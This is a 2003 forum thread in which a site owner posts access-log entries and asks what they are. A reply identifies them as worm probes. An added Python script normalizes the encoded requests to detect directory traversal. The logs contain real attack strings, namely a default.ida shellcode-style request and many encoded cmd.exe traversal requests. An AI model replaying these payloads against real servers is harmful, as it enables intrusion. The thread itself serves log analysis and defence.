Virus, Hacker or what?

I keep getting this showing up in my access log. I am guessing it is some kind of script probing my machine for vulnerabilities?

Anyone know for sure?


68.83.51.194 - - [10/Sep/2003:11:11:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1072 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:15 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:16 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:18 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:26 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:28 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:32 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:36 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:38 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:39 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:41 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:43 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"

Yes, it is indeed a worm, but I believe Apache is safe, and so is patched IIS.
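An added example, not part of the original thread: a log triage script showing that the differently encoded `cmd.exe` requests above all normalize to the same directory traversal, and recording the status code each one received. It assumes a lax decoder that folds `0xC0`/`0xC1` two-byte sequences without checking the trailing byte; the `192.0.2.10` line is constructed for contrast.

```python
import re

# Constructed sample: four requests copied from the log above plus one benign
# request (192.0.2.10) invented for contrast.
SAMPLE = [
    '68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"',
    '68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"',
    '68.80.96.56 - - [10/Sep/2003:13:01:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"',
    '68.80.96.56 - - [10/Sep/2003:13:01:38 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"',
    '192.0.2.10 - - [10/Sep/2003:13:05:00 -0400] "GET /docs/a%20b.html HTTP/1.0" 200 512 "-" "-"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
PCT_RE = re.compile(rb"%([0-9A-Fa-f]{2})")
OVERLONG_RE = re.compile(rb"[\xc0\xc1](.)", re.S)
TRAVERSAL_RE = re.compile(rb"\.\.[/\\]")

def decode_once(raw: bytes) -> bytes:
    """One percent-decoding pass, then fold 0xC0/0xC1 two-byte sequences."""
    out = PCT_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    # Assumption: lax decoder, (lead & 0x1F) << 6 | (trail & 0x3F), trail unchecked.
    return OVERLONG_RE.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]), out)

def normalize(raw: bytes, max_rounds: int = 5):
    """Decode until stable; return (bytes, number of passes that changed them)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = decode_once(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    return raw, rounds

def analyze(line: str):
    """Parse one combined-format log line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    raw = target.split("?", 1)[0].encode("latin-1", "replace")
    norm, rounds = normalize(raw)
    # Flag only traversal steps that were invisible before decoding.
    hidden = len(TRAVERSAL_RE.findall(norm)) > len(TRAVERSAL_RE.findall(raw))
    return {"ip": ip, "status": int(status), "rounds": rounds,
            "path": norm.decode("latin-1"), "encoded_traversal": hidden}

if __name__ == "__main__":
    for entry in SAMPLE:
        print(analyze(entry))
```

A `rounds` value of 2 marks the double-encoded variants (`%255c`, `%%35%63`); the 404 and 400 status codes show the server answering these requests did not serve the requested file.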